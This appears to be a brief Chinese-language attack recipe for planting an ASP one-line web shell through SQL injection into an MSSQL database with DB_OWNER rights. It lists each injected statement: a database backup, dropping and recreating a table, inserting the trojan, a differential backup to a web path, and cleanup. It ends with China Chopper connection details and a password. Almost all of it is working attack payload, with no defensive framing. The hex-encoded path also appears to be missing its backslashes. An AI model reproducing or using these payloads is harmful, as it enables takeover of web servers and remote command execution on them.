当前数据库:wangdachui
权限:DB_OWNER
WEB路径:C:\www\html\
其实就是一种注入的方式去备份
第一步
将数据库名转成16进制变成:0x77616E67646163687569
;declare @a sysname,@s varchar(3000) select @a=db_name(),@s=0x77616E67646163687569 backup database @a to disk=@s--
第二步,删除表 然后再建表
;Drop table [dachui];create table [dbo].[dachui] ([cmd] [image])--
第三步插入一句话木马
;insert into dachui(cmd) values(<%execute request("xjh")%>一句话木马转换为16进制)--
第四步
将备份路径C:\www\html\1.asp转成16进制变成:0x433A77777768746D6C312E617370
;declare @a sysname,@s varchar(3000) select @a=db_name(),@s=0x433A77777768746D6C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
最后一步删除表
;Drop table [dachui]--
中国菜刀连接
http://domain.com/1.asp 密码:xjh